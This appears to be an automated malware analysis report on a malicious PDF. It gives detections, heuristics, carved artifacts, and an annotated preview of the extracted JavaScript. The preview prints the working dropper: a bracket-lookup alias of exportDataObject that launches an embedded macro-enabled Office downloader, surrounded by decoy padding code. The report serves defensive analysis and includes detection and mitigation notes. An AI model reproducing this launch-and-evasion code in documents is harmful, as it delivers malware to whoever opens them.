Malicious PDF — malware analysis report

Static analysis result for SHA-256 1993afcca49c52bc…

MALICIOUS

PDF

65.5 KB Created: 2017-05-11 23:52:42 +03:00 Authoring application: 3230048 (via iTextSharp™ 5.5.10 ©2000-2016 iText Group NV (AGPL-version)) First seen: 2021-01-15
MD5: 6be6357e4c8926905aa4efd5ab754c4d SHA-1: c6b954b7fd867e2f4a62cc24dbe62dcf0ce79d7b SHA-256: 1993afcca49c52bc927514bd9c6644fd85359ea176c6af7bebf4f13c29cb4e83
216 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 7

  • ClamAV: Pdf.Malware.Agent-6312852-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Malware.Agent-6312852-0
  • Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTH
    A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — it could carry an executable or another weaponised document as a nested payload.
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
SAQIGU.docm pdf-embedded-file PDF EmbeddedFile object 4 at offset 0x84C 74988 bytes
SHA-256: 5ef6d249672e07149f7bf6efb2878dfd4cafd67290ac263fba7c3fdfba4df464
Detection
ClamAV: Doc.Downloader.Donoff-10030369-0
Obfuscation or payload: likely
actual_type=ZIP; declared_or_context_type=PDF; filename=SAQIGU.docm; kind=pdf-embedded-file
javascript_obj0006_001.js pdf-javascript-stream PDF /JS object 6 at offset 0xFB7E 4564 bytes
SHA-256: 02d20ccb81f8b53897830484b3119fdb4a7fb24e8d41928880904f19bd0ea91e
Preview script
First 1,000 lines of the extracted script
// Likely padding/decoy: a browser-side AmCharts dashboard controller that appears to be
// copied from a public admin-template. Every external name it touches (AmCharts, baConfig,
// baUtil, layoutPaths) is a browser/framework global that Acrobat's JavaScript engine does
// not provide, so inside the PDF this function is never called with working inputs; its
// presumable purpose is to dilute the script with benign-looking code (see the
// "Suspicious extracted artifact" / EXTRACTED_FILE_STATIC_TRIAGE finding above).
// NOTE(review): the trailing `var dis = 2;` appended to the second line is NOT part of the
// decoy — it is the launch-mode value that submarine() later passes as nLaunch.
function DashboardLineChartCtrl(baConfig, layoutPaths, baUtil) {    var layoutColors = baConfig.colors;    var graphColor = baConfig.theme.blur ? '#000000' : layoutColors.primary;    var chartData = [      { date: new Date(2012, 11), value: 0, value0: 0 },      { date: new Date(2013, 0), value: 15000, value0: 19000},      { date: new Date(2013, 1), value: 30000, value0: 20000},      { date: new Date(2013, 2), value: 25000, value0: 22000},      { date: new Date(2013, 3), value: 21000, value0: 25000},      { date: new Date(2013, 4), value: 24000, value0: 29000},      { date: new Date(2013, 5), value: 31000, value0: 26000},      { date: new Date(2013, 6), value: 40000, value0: 25000},      { date: new Date(2013, 7), value: 37000, value0: 20000},      { date: new Date(2013, 8), value: 18000, value0: 22000},      { date: new Date(2013, 9), value: 5000, value0: 26000},      { date: new Date(2013, 10), value: 40000, value0: 30000},      { date: new Date(2013, 11), value: 20000, value0: 25000},      { date: new Date(2014, 0), value: 5000, value0: 13000},      { date: new Date(2014, 1), value: 3000, value0: 13000},      { date: new Date(2014, 2), value: 1800, value0: 13000},      { date: new Date(2014, 3), value: 10400, value0: 13000},      { date: new Date(2014, 4), value: 25500, value0: 13000},      { date: new Date(2014, 5), value: 2100, value0: 13000},      { date: new Date(2014, 6), value: 6500, value0: 13000},      { date: new Date(2014, 7), value: 1100, value0: 13000},      { date: new Date(2014, 8), value: 17200, value0: 13000},      { date: new Date(2014, 9), value: 26900, value0: 13000},      { date: new Date(2014, 10), value: 14100, value0: 13000},      { date: new Date(2014, 11), value: 35300, value0: 13000},      { date: new Date(2015, 0), value: 54800, value0: 13000},      { date: new Date(2015, 1), value: 49800, value0: 13000}    ];    var chart = AmCharts.makeChart('amchart', {      type: 'serial',      theme: 'blur',      marginTop: 15,      marginRight: 
15,      dataProvider: chartData,      categoryField: 'date',      categoryAxis: {        parseDates: true,        gridAlpha: 0,        color: layoutColors.defaultText,        axisColor: layoutColors.defaultText      },      valueAxes: [        {          minVerticalGap: 50,          gridAlpha: 0,          color: layoutColors.defaultText,          axisColor: layoutColors.defaultText        }      ],      graphs: [        {          id: 'g0',          bullet: 'none',          useLineColorForBulletBorder: true,          lineColor: baUtil.hexToRGB(graphColor, 0.3),          lineThickness: 1,          negativeLineColor: layoutColors.danger,          type: 'smoothedLine',          valueField: 'value0',          fillAlphas: 1,          fillColorsField: 'lineColor'        },        {          id: 'g1',          bullet: 'none',          useLineColorForBulletBorder: true,          lineColor: baUtil.hexToRGB(graphColor, 0.5),          lineThickness: 1,          negativeLineColor: layoutColors.danger,          type: 'smoothedLine',          valueField: 'value',          fillAlphas: 1,          fillColorsField: 'lineColor'        }      ],      chartCursor: {        categoryBalloonDateFormat: 'MM YYYY',        categoryBalloonColor: '#4285F4',        categoryBalloonAlpha: 0.7,        cursorAlpha: 0,        valueLineEnabled: true,        valueLineBalloonEnabled: true,        valueLineAlpha: 0.5      },      dataDateFormat: 'MM YYYY',      export: {        enabled: true      },      creditsPosition: 'bottom-right',      zoomOutButton: {        backgroundColor: '#fff',        backgroundAlpha: 0      },      zoomOutText: '',      pathToImages: layoutPaths.images.amChart    });    function zoomChart() {      chart.zoomToDates(new Date(2013, 3), new Date(2014, 0));    };    chart.addListener('rendered', zoomChart);    zoomChart();    if (chart.zoomChart) {      chart.zoomChart();    }  };var dis = 2;
// The actual payload (the part that matters for the PDF_JAVASCRIPT / PDF_EMBEDDED findings).
// In an Acrobat document-level script `this` is the Doc object, so `abc` becomes an alias for
// Doc.exportDataObject; the bracket lookup means the usual `.exportDataObject(` call pattern
// never appears in the source, which presumably is meant to weaken simple signature matching.
// submarine() invokes it with cName "SAQIGU.docm" — the same embedded file carved as the
// first extracted artifact on this page (ClamAV: Doc.Downloader.Donoff-10030369-0,
// actual_type=ZIP, i.e. an OOXML macro-enabled document) — and nLaunch = dis, which is 2.
// Per the Acrobat JavaScript API reference, nLaunch 2 saves the attachment to a temporary
// location and launches it with its associated application without a save dialog; this is
// the attachment-to-Office-macro hand-off the ClamAV detections describe.
// NOTE(review): nothing in this preview shows what calls submarine(); the /JavaScript action
// counted by PDF_JAVASCRIPT is the likely trigger — confirm against the document's action
// dictionaries before stating it as fact.
// Detection/mitigation notes for the analyst: alert on exportDataObject (including bracket or
// string-built lookups) paired with a non-zero nLaunch in PDF JavaScript; disabling
// JavaScript and attachment launching in the reader, and stripping/quarantining macro-enabled
// Office attachments inside PDFs at the gateway, both break this chain.
// The `findByUsername` function appended after the payload is more padding: it uses the
// Node-only `process.nextTick` and an undefined `records` array, so it cannot execute in a PDF.
var abc = this['exportDataObject'];
function submarine() { abc({ cName: "SAQIGU.docm", nLaunch: dis });};var findByUsername = function(username, cb) {  process.nextTick(function() {    for (var i = 0, len = records.length; i < len; i++) {      var record = records[i];      if (record.username === username) {        return cb(null, record);      }    }    return cb(null, null);  });};
// Padding: a string array of Connect/Express-style middleware names. It is not referenced
// anywhere in the visible script and has no meaning inside Acrobat; like the chart controller
// above, it appears to exist only to make the stream look like ordinary web application code.
var d = [  'json',  'urlencoded', 'bodyParser',  'compress',  'cookieSession',  'session',  'logger', 'cookieParser',  'favicon', 'responseTime',  'errorHandler', 'timeout',  'methodOverride',  'vhost', 'csrf',  'directory',  'limit', 'multipart',  'staticCache',];